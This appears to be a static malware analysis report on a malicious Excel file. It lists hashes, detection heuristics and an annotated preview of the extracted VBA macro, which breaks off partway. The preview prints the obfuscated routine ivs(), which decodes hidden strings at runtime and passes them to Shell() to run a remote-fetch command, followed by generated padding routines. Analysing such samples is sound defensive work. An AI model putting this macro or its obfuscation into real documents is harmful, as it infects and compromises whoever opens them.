Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 71e92d9677ca26e6…

MALICIOUS

Office (OLE)

150.0 KB Created: 2006-09-16 00:00:00 (document-property timestamp — attacker-controlled metadata, not evidence of the file's actual age; note it predates First seen by 14 years) Authoring application: Microsoft Excel First seen: 2020-09-07
MD5: 000fb5420a53732ea57cc9b898808440 SHA-1: bb581e9729554fc5adfa98ae547b1b11b40b9199 SHA-256: 71e92d9677ca26e6634abf2a38deb29499c390e840a01fd71fe956da1154400f
140 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1203 Exploitation for Client Execution

The critical heuristic 'OLE_VBA_SHELL' flags a Shell() call in the VBA macro: Sub ivs() in Module1 builds its command line by concatenating two strings that are decoded at runtime by the helper function DBKhWzyXM (each call passes a short numeric second argument, consistent with a keyed character-offset decode — to be confirmed against the helper's body, which falls outside the previewed lines). Because the command only materialises at runtime, the static strings alone do not establish what is executed; the "download and execute a secondary payload" reading is plausible but inferred. The remaining routines in the module are padding: each one repeats the previous routine and appends one more no-op (GoTo to the next line, DoEvents busy-loops, comparisons of unequal string constants), typical of generated obfuscation. No Auto_Open/Workbook_Open handler appears in the first 1,000 lines, so the trigger for ivs() is not visible in this excerpt. The ClamAV detection 'Xls.Malware.Stratos-7506050-0' corroborates the verdict. The listed heuristics evidence macro-based execution rather than a software exploit, so the T1203 mapping is not supported by the findings shown.

Heuristics 3

  • ClamAV: Xls.Malware.Stratos-7506050-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Malware.Stratos-7506050-0
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 66256 bytes
SHA-256: f0ccace1beb0142a6a6ae945edff5bda63bc315a925dedb941e582ac20621bb1
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
' Decoded VBA source of the single module carved by olevba. Only ivs() below
' does anything observable; every other routine in the preview is padding.
' The routine of interest: builds a command line from two strings that are
' decoded at runtime by DBKhWzyXM and passes the result to Shell().
' The decoder's body is not in this preview; its second argument is a short
' numeric string each time, which looks like a character-offset key —
' confirm against the decoder before treating any decoded value as an IOC.
' NOTE(review): no Auto_Open/Workbook_Open/Auto_Close appears in the first
' 1,000 lines, so how ivs() gets invoked is not visible here.
Sub ivs()

' First fragment of the command (key "4"). `ii` is not declared in this Sub.
ii = DBKhWzyXM("qwlxe$lxxt>``n2qt`", "4")

' Second fragment (key "6") is appended and the concatenation is executed.
' This is the line that triggers the OLE_VBA_SHELL heuristic.
Shell (ii + DBKhWzyXM("gjoo^yjo", "6"))

End Sub
' Padding routine: not called anywhere in the visible excerpt and has no
' effect — the GoTo targets the label on the very next line.
Private Function pcDaYAizlpOpAuMJ()
GoTo PbsGcPZxsUQDYdlbGPP
PbsGcPZxsUQDYdlbGPP:

End Function
' Padding routine: two consecutive GoTo/label pairs, each jumping to the
' next line. No side effects; not called in the visible excerpt.
Private Function TqxEjwvLORJixqaIKf()
GoTo PbsGcPZxsUQDYdlbGPP
PbsGcPZxsUQDYdlbGPP:
GoTo FSssTcoQkPoFgFQKdMjS
FSssTcoQkPoFgFQKdMjS:

End Function
' Padding routine: the no-op GoTo pairs plus a busy-wait loop that calls
' DoEvents 27 times (counter runs 3..29). Returns nothing; not called in
' the visible excerpt.
Public Function kgrIQfgqNI()
GoTo PbsGcPZxsUQDYdlbGPP
PbsGcPZxsUQDYdlbGPP:
GoTo FSssTcoQkPoFgFQKdMjS
FSssTcoQkPoFgFQKdMjS:
Dim tBrQRSQVGN As Integer
tBrQRSQVGN = 3
' Short stall; likely timing padding rather than meaningful work — TODO confirm.
Do While tBrQRSQVGN < 30
   DoEvents: tBrQRSQVGN = tBrQRSQVGN + 1
Loop

End Function
' Padding routine: same as kgrIQfgqNI plus a guarded End that never runs
' (the two string literals compared are different constants).
Private Sub cRULlNtqZMiYOdnVVI()
GoTo PbsGcPZxsUQDYdlbGPP
PbsGcPZxsUQDYdlbGPP:
GoTo FSssTcoQkPoFgFQKdMjS
FSssTcoQkPoFgFQKdMjS:
Dim tBrQRSQVGN As Integer
tBrQRSQVGN = 3
' 27 DoEvents iterations (3..29).
Do While tBrQRSQVGN < 30
   DoEvents: tBrQRSQVGN = tBrQRSQVGN + 1
Loop
' Always false: unequal constants, so End is dead code.
If "vOuRkwkicurNxHNJVno" = "KTrZCRyEYgVBwxvAl" Then End

End Sub
' Padding routine: the previous no-ops plus an Integer that is assigned the
' string literal "805" (implicitly coerced) and never read.
Public Sub lPqcswyqPsQ()
GoTo PbsGcPZxsUQDYdlbGPP
PbsGcPZxsUQDYdlbGPP:
GoTo FSssTcoQkPoFgFQKdMjS
FSssTcoQkPoFgFQKdMjS:
Dim tBrQRSQVGN As Integer
tBrQRSQVGN = 3
' 27 DoEvents iterations (3..29).
Do While tBrQRSQVGN < 30
   DoEvents: tBrQRSQVGN = tBrQRSQVGN + 1
Loop
' Always false: unequal constants, so End is dead code.
If "vOuRkwkicurNxHNJVno" = "KTrZCRyEYgVBwxvAl" Then End
Dim CtGRAznZAQjxfwimMA As Integer
' Write-only variable.
CtGRAznZAQjxfwimMA = "805"

End Sub
' Padding routine: identical to lPqcswyqPsQ with a third GoTo-to-next-line
' appended. Each routine in this module repeats the previous one and adds
' one more no-op — a generator signature, not hand-written code.
Private Function HeAZebmpEabkupSiB()
GoTo PbsGcPZxsUQDYdlbGPP
PbsGcPZxsUQDYdlbGPP:
GoTo FSssTcoQkPoFgFQKdMjS
FSssTcoQkPoFgFQKdMjS:
Dim tBrQRSQVGN As Integer
tBrQRSQVGN = 3
' 27 DoEvents iterations (3..29).
Do While tBrQRSQVGN < 30
   DoEvents: tBrQRSQVGN = tBrQRSQVGN + 1
Loop
' Always false: unequal constants, so End is dead code.
If "vOuRkwkicurNxHNJVno" = "KTrZCRyEYgVBwxvAl" Then End
Dim CtGRAznZAQjxfwimMA As Integer
' Write-only variable.
CtGRAznZAQjxfwimMA = "805"
GoTo DMNLQBuBgtsIMOGgvnYF
DMNLQBuBgtsIMOGgvnYF:

End Function
' Padding routine: previous no-ops plus a second busy-wait loop of 32
' DoEvents iterations (counter 3..34). No side effects beyond the stall.
Public Function cEJYiCPDqQnmNvMzD()
GoTo PbsGcPZxsUQDYdlbGPP
PbsGcPZxsUQDYdlbGPP:
GoTo FSssTcoQkPoFgFQKdMjS
FSssTcoQkPoFgFQKdMjS:
Dim tBrQRSQVGN As Integer
tBrQRSQVGN = 3
' 27 DoEvents iterations (3..29).
Do While tBrQRSQVGN < 30
   DoEvents: tBrQRSQVGN = tBrQRSQVGN + 1
Loop
' Always false: unequal constants, so End is dead code.
If "vOuRkwkicurNxHNJVno" = "KTrZCRyEYgVBwxvAl" Then End
Dim CtGRAznZAQjxfwimMA As Integer
' Write-only variable.
CtGRAznZAQjxfwimMA = "805"
GoTo DMNLQBuBgtsIMOGgvnYF
DMNLQBuBgtsIMOGgvnYF:
Dim bYuQphdpFUqenKFjl As Integer
bYuQphdpFUqenKFjl = 3
' 32 DoEvents iterations (3..34).
Do While bYuQphdpFUqenKFjl < 35
   DoEvents: bYuQphdpFUqenKFjl = bYuQphdpFUqenKFjl + 1
Loop

End Function
' Padding routine: previous no-ops plus a second always-false guarded End
' (again comparing two different string constants).
Private Sub oTdechELSwJIZdf()
GoTo PbsGcPZxsUQDYdlbGPP
PbsGcPZxsUQDYdlbGPP:
GoTo FSssTcoQkPoFgFQKdMjS
FSssTcoQkPoFgFQKdMjS:
Dim tBrQRSQVGN As Integer
tBrQRSQVGN = 3
' 27 DoEvents iterations (3..29).
Do While tBrQRSQVGN < 30
   DoEvents: tBrQRSQVGN = tBrQRSQVGN + 1
Loop
' Always false: unequal constants, so End is dead code.
If "vOuRkwkicurNxHNJVno" = "KTrZCRyEYgVBwxvAl" Then End
Dim CtGRAznZAQjxfwimMA As Integer
' Write-only variable.
CtGRAznZAQjxfwimMA = "805"
GoTo DMNLQBuBgtsIMOGgvnYF
DMNLQBuBgtsIMOGgvnYF:
Dim bYuQphdpFUqenKFjl As Integer
bYuQphdpFUqenKFjl = 3
' 32 DoEvents iterations (3..34).
Do While bYuQphdpFUqenKFjl < 35
   DoEvents: bYuQphdpFUqenKFjl = bYuQphdpFUqenKFjl + 1
Loop
' Always false as well; End never executes.
If "oVYtVaokShGGhqCf" = "eBTtTfZraxhrxtF" Then End

End Sub
' Padding routine: identical to oTdechELSwJIZdf with a fourth
' GoTo-to-next-line appended. Not called in the visible excerpt.
Private Sub lsuDbVzBioHPFlggfkUc()
GoTo PbsGcPZxsUQDYdlbGPP
PbsGcPZxsUQDYdlbGPP:
GoTo FSssTcoQkPoFgFQKdMjS
FSssTcoQkPoFgFQKdMjS:
Dim tBrQRSQVGN As Integer
tBrQRSQVGN = 3
' 27 DoEvents iterations (3..29).
Do While tBrQRSQVGN < 30
   DoEvents: tBrQRSQVGN = tBrQRSQVGN + 1
Loop
' Always false: unequal constants, so End is dead code.
If "vOuRkwkicurNxHNJVno" = "KTrZCRyEYgVBwxvAl" Then End
Dim CtGRAznZAQjxfwimMA As Integer
' Write-only variable.
CtGRAznZAQjxfwimMA = "805"
GoTo DMNLQBuBgtsIMOGgvnYF
DMNLQBuBgtsIMOGgvnYF:
Dim bYuQphdpFUqenKFjl As Integer
bYuQphdpFUqenKFjl = 3
' 32 DoEvents iterations (3..34).
Do While bYuQphdpFUqenKFjl < 35
   DoEvents: bYuQphdpFUqenKFjl = bYuQphdpFUqenKFjl + 1
Loop
' Always false as well; End never executes.
If "oVYtVaokShGGhqCf" = "eBTtTfZraxhrxtF" Then End
GoTo pfiaycGEmb
pfiaycGEmb:

End Sub
Public Function mdqAkjQQxGSvOu()
GoTo PbsGcPZxsUQDYdlbGPP
PbsGcPZxsUQDYdlbGPP:
GoTo FSssTcoQkPoFgFQKdMjS
FSssTcoQkPoFgFQKdMjS:
Dim tBrQRSQVGN As Integer
tBrQRSQVGN = 3
Do While tBrQRSQVGN < 30
   DoEvents: tBrQRSQVGN = tBrQRSQVGN + 1
Loop
If "vOuRkwkicurNxHNJVno" = "KTrZCRyEYgVBwxvAl" Then End
Dim CtGRAznZAQjxfwimMA As Integer
CtGRAznZAQjxfwimMA = "805"
GoTo DMNLQBuBgtsIMOGgvnYF
DMNLQBuBgtsIMOGgvnYF:
Dim bY
... (truncated)